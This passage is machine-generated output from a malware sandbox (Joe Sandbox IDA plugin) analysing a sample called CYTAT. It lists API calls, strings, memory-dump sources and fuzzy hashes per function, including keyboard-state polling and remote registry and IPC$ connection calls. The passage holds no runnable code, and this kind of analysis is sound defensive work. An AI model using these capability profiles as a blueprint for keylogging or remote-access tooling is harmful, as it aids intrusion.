                                                • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                • String ID:
                                                • API String ID: 136442275-0
                                                • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                APIs
                                                • _wcsncpy.LIBCMT ref: 00467490
                                                • _wcsncpy.LIBCMT ref: 004674BC
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • _wcstok.LIBCMT ref: 004674FF
                                                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                • _wcstok.LIBCMT ref: 004675B2
                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                • _wcslen.LIBCMT ref: 00467793
                                                • _wcscpy.LIBCMT ref: 00467641
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • _wcslen.LIBCMT ref: 004677BD
                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                • String ID: X
                                                • API String ID: 3104067586-3081909835
                                                • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                • _wcslen.LIBCMT ref: 0046CDB0
                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                  • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                  • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                Strings
                                                • NULL Pointer assignment, xrefs: 0046CEA6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                • String ID: NULL Pointer assignment
                                                • API String ID: 440038798-2785691316
                                                • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                • _wcslen.LIBCMT ref: 004610A3
                                                • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                • GetWindowRect.USER32(?,?), ref: 00461248
                                                  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                • String ID: ThumbnailClass
                                                • API String ID: 4136854206-1241985126
                                                • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                APIs
                                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                • GetClientRect.USER32(?,?), ref: 00471A1A
                                                • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                • DestroyIcon.USER32(?), ref: 00471AF4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                • String ID: 2
                                                • API String ID: 1331449709-450215437
                                                • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                • __swprintf.LIBCMT ref: 00460915
                                                • __swprintf.LIBCMT ref: 0046092D
                                                • _wprintf.LIBCMT ref: 004609E1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                • API String ID: 3054410614-2561132961
                                                APIs
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                Similarity
                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                • API String ID: 600699880-22481851
                                                Similarity
                                                • API ID: DestroyWindow
                                                • String ID: static
                                                • API String ID: 3375834691-2160076837
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                Similarity
                                                • API ID: ErrorMode$DriveType
                                                • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                • API String ID: 2907320926-3566645568
                                                APIs
                                                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                • DeleteObject.GDI32(00310000), ref: 00470A04
                                                • DestroyIcon.USER32(0041005C), ref: 00470A1C
                                                • DeleteObject.GDI32(FB8E1CF9), ref: 00470A34
                                                • DestroyWindow.USER32(00720065), ref: 00470A4C
                                                • DestroyIcon.USER32(?), ref: 00470A73
                                                • DestroyIcon.USER32(?), ref: 00470A81
                                                • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                Similarity
                                                • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                • String ID:
                                                • API String ID: 1237572874-0
                                                APIs
                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                • VariantInit.OLEAUT32(?), ref: 004793E1
                                                • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                • VariantClear.OLEAUT32(?), ref: 00479489
                                                • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                • VariantClear.OLEAUT32(?), ref: 004794CA
                                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                Similarity
                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                • String ID:
                                                • API String ID: 2706829360-0
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 0044480E
                                                • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                • GetKeyState.USER32(000000A0), ref: 004448AA
                                                • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                • GetKeyState.USER32(000000A1), ref: 004448D9
                                                • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                • GetKeyState.USER32(00000011), ref: 00444903
                                                • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                • GetKeyState.USER32(00000012), ref: 0044492D
                                                • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                • GetKeyState.USER32(0000005B), ref: 00444958
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                Similarity
                                                • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                • String ID:
                                                • API String ID: 3413494760-0
                                                Similarity
                                                • API ID: AddressProc_free_malloc$_strcat_strlen
                                                • String ID: AU3_FreeVar
                                                • API String ID: 2634073740-771828931
                                                APIs
                                                • CoInitialize.OLE32 ref: 0046C63A
                                                • CoUninitialize.OLE32 ref: 0046C645
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                  • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                • IIDFromString.OLE32(?,?), ref: 0046C705
                                                Similarity
                                                • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                • API String ID: 2294789929-1287834457
                                                APIs
                                                  • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                  • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                • ReleaseCapture.USER32 ref: 0047116F
                                                • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                • API String ID: 2483343779-2107944366
                                                • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                APIs
                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                • _wcslen.LIBCMT ref: 00450720
                                                • _wcscat.LIBCMT ref: 00450733
                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window_wcscat_wcslen
                                                • String ID: -----$SysListView32
                                                • API String ID: 4008455318-3975388722
                                                • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                • GetParent.USER32 ref: 00469C98
                                                • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                • GetParent.USER32 ref: 00469CBC
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 2360848162-1403004172
                                                • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                • String ID:
                                                • API String ID: 262282135-0
                                                • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                APIs
                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow
                                                • String ID:
                                                • API String ID: 312131281-0
                                                • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                APIs
                                                  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                • SendMessageW.USER32(75A523D0,00001001,00000000,?), ref: 00448E16
                                                • SendMessageW.USER32(75A523D0,00001026,00000000,?), ref: 00448E25
                                                  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
